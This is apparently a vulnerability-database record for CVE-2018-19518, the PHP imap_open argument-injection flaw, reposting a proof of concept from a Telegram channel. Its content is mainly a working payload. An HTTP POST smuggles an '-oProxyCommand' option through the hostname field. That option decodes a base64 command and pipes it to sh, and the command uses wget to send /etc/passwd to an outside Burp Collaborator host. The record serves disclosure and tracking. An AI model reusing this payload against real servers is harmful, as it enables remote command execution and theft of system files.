{"uuid": "3756a222-ad08-45f4-9aa3-dccc6ad511e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1649", "content": "#exploit\nCVE-2018-19518 (PHP IMAP Vulnerability):\nUniversity of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command without preventing argument injection, which might allow remote malicious users to execute arbitrary OS commands\n\nPoC:\necho \"wget --post-file /etc/passwd burpcollaborator(dot)net\" | base64 \n\nPOST / HTTP/1.1\nHost: Redacted\n\nhostname=x+-oProxyCommand%3echo%09d2dldCAtLXBvc3QtZmlsZSAvZXRjL3Bhc3N3ZCBidXJwY29sbGFib3JhdG9yLm5ldAo|base64%09-d|sh}&username=test&password=222", "creation_timestamp": "2022-12-14T23:09:09.000000Z"}